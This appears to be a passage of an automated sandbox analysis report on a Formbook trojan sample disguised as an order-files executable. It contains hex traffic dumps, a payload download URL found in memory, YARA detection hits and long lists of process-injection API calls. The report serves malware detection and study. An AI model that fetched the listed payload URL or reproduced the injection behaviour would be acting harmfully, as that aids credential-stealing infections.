23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:51:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 69 6e 64 65 6b 73 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:51:28 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:51:33.7673406Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:51:31 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-08-27T15:51:33.7673406Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:51:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:51:39.7128638Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:51:37 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:51:42.0304318Z
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: IMG_00991ORDER_FILES.exe, 00000000.00000000.5788656915.000000000040A000.00000008.00000001.01000000.00000003.sdmp, IMG_00991ORDER_FILES.exe, 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000000.6546131964.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000626000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kapiextra.com/wRdZDseACWW137.bin
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kapiextra.com/wRdZDseACWW137.bin4
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kapiextra.com/wRdZDseACWW137.binT
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kapiextra.com/wRdZDseACWW137.binX
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.00000000005F2000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.00000000005F2000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: initial sampleStatic PE information: Filename: IMG_00991ORDER_FILES.exe
        Source: initial sampleStatic PE information: Filename: IMG_00991ORDER_FILES.exe
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352134E0 NtCreateMutant,LdrInitializeThunk,3_2_352134E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_35212D10
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_35212B90
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212A80 NtClose,LdrInitializeThunk,3_2_35212A80
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35214570 NtSuspendThread,3_2_35214570
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35214260 NtSetContextThread,3_2_35214260
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212D50 NtWriteVirtualMemory,3_2_35212D50
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212DA0 NtReadVirtualMemory,3_2_35212DA0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212DC0 NtAdjustPrivilegesToken,3_2_35212DC0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212C20 NtSetInformationFile,3_2_35212C20
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35213C30 NtOpenProcessToken,3_2_35213C30
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212C30 NtMapViewOfSection,3_2_35212C30
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212C10 NtOpenProcess,3_2_35212C10
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212C50 NtUnmapViewOfSection,3_2_35212C50
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35213C90 NtOpenThread,3_2_35213C90
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212CF0 NtDelayExecution,3_2_35212CF0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212CD0 NtEnumerateKey,3_2_35212CD0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212F30 NtOpenDirectoryObject,3_2_35212F30
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212F00 NtCreateFile,3_2_35212F00
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212FB0 NtSetValueKey,3_2_35212FB0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212E00 NtQueueApcThread,3_2_35212E00
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212E50 NtCreateSection,3_2_35212E50
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212EB0 NtProtectVirtualMemory,3_2_35212EB0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212E80 NtCreateProcessEx,3_2_35212E80
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212EC0 NtQuerySection,3_2_35212EC0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212ED0 NtResumeThread,3_2_35212ED0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352129F0 NtReadFile,3_2_352129F0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352129D0 NtWaitForSingleObject,3_2_352129D0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A334E0 NtCreateMutant,LdrInitializeThunk,5_2_04A334E0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A34570 NtSuspendThread,LdrInitializeThunk,5_2_04A34570
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A34260 NtSetContextThread,LdrInitializeThunk,5_2_04A34260
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32CF0 NtDelayExecution,LdrInitializeThunk,5_2_04A32CF0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32C30 NtMapViewOfSection,LdrInitializeThunk,5_2_04A32C30
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04A32C50
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_04A32DA0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_04A32D10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32ED0 NtResumeThread,LdrInitializeThunk,5_2_04A32ED0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32E00 NtQueueApcThread,LdrInitializeThunk,5_2_04A32E00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32E50 NtCreateSection,LdrInitializeThunk,5_2_04A32E50
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32F00 NtCreateFile,LdrInitializeThunk,5_2_04A32F00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A338D0 NtGetContextThread,LdrInitializeThunk,5_2_04A338D0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A329F0 NtReadFile,LdrInitializeThunk,5_2_04A329F0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32A80 NtClose,LdrInitializeThunk,5_2_04A32A80
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04A32AC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32A10 NtWriteFile,LdrInitializeThunk,5_2_04A32A10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32B80 NtCreateKey,LdrInitializeThunk,5_2_04A32B80
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04A32B90
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_04A32BC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32B00 NtQueryValueKey,LdrInitializeThunk,5_2_04A32B00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04A32B10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A33C90 NtOpenThread,5_2_04A33C90
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32CD0 NtEnumerateKey,5_2_04A32CD0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32C20 NtSetInformationFile,5_2_04A32C20
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A33C30 NtOpenProcessToken,5_2_04A33C30
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32C10 NtOpenProcess,5_2_04A32C10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32DC0 NtAdjustPrivilegesToken,5_2_04A32DC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32D50 NtWriteVirtualMemory,5_2_04A32D50
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32EB0 NtProtectVirtualMemory,5_2_04A32EB0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32E80 NtCreateProcessEx,5_2_04A32E80
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32EC0 NtQuerySection,5_2_04A32EC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32FB0 NtSetValueKey,5_2_04A32FB0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32F30 NtOpenDirectoryObject,5_2_04A32F30
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A329D0 NtWaitForSingleObject,5_2_04A329D0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32AA0 NtQueryInformationFile,5_2_04A32AA0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32BE0 NtQueryVirtualMemory,5_2_04A32BE0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A32B20 NtQueryInformationProcess,5_2_04A32B20
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1EFDA NtQueryInformationProcess,NtReadVirtualMemory,5_2_04D1EFDA
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1F99A NtClose,5_2_04D1F99A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_6F8A1BFF0_2_6F8A1BFF
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352AA5263_2_352AA526
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529F5C93_2_3529F5C9
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352975C63_2_352975C6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E04453_2_351E0445
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E27603_2_351E2760
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EA7603_2_351EA760
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352967573_2_35296757
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527D62C3_2_3527D62C
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FC6003_2_351FC600
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352046703_2_35204670
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3528D6463_2_3528D646
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E06803_2_351E0680
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352536EC3_2_352536EC
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529F6F63_2_3529F6F6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DC6E03_2_351DC6E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF1133_2_351CF113
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527D1303_2_3527D130
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A010E3_2_352A010E
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3522717A3_2_3522717A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E51C03_2_351E51C0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FB1E03_2_351FB1E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3528E0763_2_3528E076
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D00A03_2_351D00A0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EB0D03_2_351EB0D0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352970F13_2_352970F1
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EE3103_2_351EE310
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529F3303_2_3529F330
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D13803_2_351D1380
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CD2EC3_2_351CD2EC
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529FD273_2_3529FD27
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DAD003_2_351DAD00
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35297D4C3_2_35297D4C
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E0D693_2_351E0D69
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F2DB03_2_351F2DB0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E9DD03_2_351E9DD0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527FDF43_2_3527FDF4
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D0C123_2_351D0C12
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EAC203_2_351EAC20
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35296C693_2_35296C69
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529EC603_2_3529EC60
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3528EC4C3_2_3528EC4C
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E3C603_2_351E3C60
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35279C983_2_35279C98
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F8CDF3_2_351F8CDF
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352AACEB3_2_352AACEB
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FFCE03_2_351FFCE0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351ECF003_2_351ECF00
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529FF633_2_3529FF63
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529EFBF3_2_3529EFBF
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35291FC63_2_35291FC6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E6FE03_2_351E6FE0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35280E6D3_2_35280E6D
